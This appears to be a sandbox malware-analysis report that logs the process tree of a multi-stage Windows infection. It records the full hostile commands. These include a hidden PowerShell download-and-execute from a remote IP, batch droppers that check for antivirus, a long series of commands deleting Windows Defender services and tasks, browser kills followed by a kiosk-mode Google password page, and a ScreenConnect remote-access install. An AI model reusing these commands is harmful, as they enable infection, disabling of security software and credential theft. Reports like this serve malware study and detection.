        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4728
      - C:\Users\Admin\AppData\Local\Temp\10341300101\BIm18E9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341300101\BIm18E9.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6776
      - C:\Users\Admin\AppData\Local\Temp\10341310101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341310101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:8388
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:8640
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:8832
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:8620
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:9540
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:9528
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12196
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12700
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1596
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        
        PID:11072
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:12964
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:13104
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:4992
      - C:\Users\Admin\AppData\Local\Temp\10341320101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341320101\TbV75ZR.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:10328
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:11664
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2400
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2680
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:5444
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        8⤵
        
        PID:12404
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2528
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6340
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6392
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 948
        9⤵
        Program crash
        
        PID:9952
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:6512
      - C:\Users\Admin\AppData\Local\Temp\10341330101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341330101\f73ae_003.exe"
        6⤵
        Executes dropped EXE
        
        PID:11060
      - C:\Users\Admin\AppData\Local\Temp\10341340101\WLbfHbp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341340101\WLbfHbp.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3372
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5752
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1708
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6444
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:6944
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6936
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6836
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        8⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        8⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:208
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 660
        9⤵
        Program crash
        
        PID:10740
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2272
      - C:\Users\Admin\AppData\Local\Temp\10341350101\8ceb476d68.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341350101\8ceb476d68.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:7056
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:7200
      - C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:9944
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:10112
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEDF.tmp\EEE0.tmp\EEE1.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        8⤵
        
        PID:10228
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2804
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F008.tmp\F009.tmp\F00A.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:10444
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:10504
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:10576
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:10600
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:10668
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:10732
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:10832
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9052
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:9288
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:9256
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:9532
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:10636
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:9180
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:5976
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:6080
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:10784
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:10824
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:10896
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:10928
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:10956
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:10988
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:11020
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:11044
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:11144
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:11172
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:11192
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:11208
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:11240
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:11260
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5816
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:11284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:11328
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:11336
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:11400
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:11424
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:11448
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:11476
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:11500
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:11528
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:11564
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:11592
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:11656
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:11684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:11936
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:11952
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:11972
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:12032
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:12048
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:12068
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:12116
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:12148
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:12204
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:12236
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:5788
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3904
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:12896
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:12912
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:12864
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:12844
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:12796
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:12744
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:12768
      - C:\Users\Admin\AppData\Local\Temp\10341370101\0746f4bfe9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341370101\0746f4bfe9.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6688
      - C:\Users\Admin\AppData\Local\Temp\10341380101\0596495a6d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341380101\0596495a6d.exe"
        6⤵
        
        PID:7968
      - C:\Users\Admin\AppData\Local\Temp\10341390101\5ff0e219c7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341390101\5ff0e219c7.exe"
        6⤵
        
        PID:8320
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:8380
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:8200
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:9332
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:9508
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:9748
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:1600
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:10104
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {2a47e6a7-1405-47c6-92b0-e26990448c50} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:10548
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2532 -prefsLen 27135 -prefMapHandle 2536 -prefMapSize 270279 -ipcHandle 2544 -initialChannelId {6a1353c4-ad9b-457a-b676-80eff600acb1} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:11372
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3696 -prefsLen 25164 -prefMapHandle 3700 -prefMapSize 270279 -jsInitHandle 3704 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3712 -initialChannelId {5c690822-9980-4267-b1d8-509085221a3d} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        
        PID:12088
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3860 -prefsLen 27276 -prefMapHandle 3864 -prefMapSize 270279 -ipcHandle 3872 -initialChannelId {250eea3a-5f74-4a1d-9ce5-4ea271bf2975} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:12136
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3088 -prefsLen 34775 -prefMapHandle 3000 -prefMapSize 270279 -jsInitHandle 3100 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3112 -initialChannelId {48b47e5d-dbdf-48f5-8758-3dcd6b1ede17} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        
        PID:5644
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 1488 -prefsLen 34905 -prefMapHandle 1648 -prefMapSize 270279 -ipcHandle 3120 -initialChannelId {72344f4a-47e1-430d-95b5-31ff48049fa2} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        
        PID:9860
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5096 -prefsLen 32793 -prefMapHandle 5100 -prefMapSize 270279 -jsInitHandle 5104 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5108 -initialChannelId {dc37eb90-bd90-4280-a190-309d61487dc2} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        
        PID:10916
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5320 -prefsLen 32793 -prefMapHandle 5324 -prefMapSize 270279 -jsInitHandle 5328 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {3ff00c00-a5e5-4872-9a9d-0f9b80d59160} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        
        PID:11120
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5252 -prefsLen 32900 -prefMapHandle 3056 -prefMapSize 270279 -jsInitHandle 5532 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5544 -initialChannelId {9babdde1-7c8c-4ef9-9eef-9422cd7a2dbe} -parentPid 10104 -crashReporter "\\.\pipe\gecko-crash-server-pipe.10104" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        
        PID:5032
      - C:\Users\Admin\AppData\Local\Temp\10341400101\5c7ccbab54.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341400101\5c7ccbab54.exe"
        6⤵
        
        PID:4816
      - C:\Users\Admin\AppData\Local\Temp\10341410101\f4be00bf2d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341410101\f4be00bf2d.exe"
        6⤵
        
        PID:9700
      - C:\Users\Admin\AppData\Local\Temp\10341420101\f601398bc7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341420101\f601398bc7.exe"
        6⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341420101\f601398bc7.exe"
        7⤵
        
        PID:8368
      - C:\Users\Admin\AppData\Local\Temp\10341430101\2b25354629.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341430101\2b25354629.exe"
        6⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10341430101\2b25354629.exe"
        7⤵
        
        PID:9448

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7840

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7180
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3C0FAF5E7CADF6285F236CAF2B52E27C C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:7064
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI1DD4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240655890 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:6956
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:7996
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2BA97E5B6D8952B07CB4432506969C7E
  2⤵
  - Loads dropped DLL
  PID:1748
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4A33D26DAF80CE81103D393C8CBC66AA E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:8204

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:6572

C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=4f73ba57-7177-4e64-a228-17c76f8a32ce&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=purchased"
1⤵
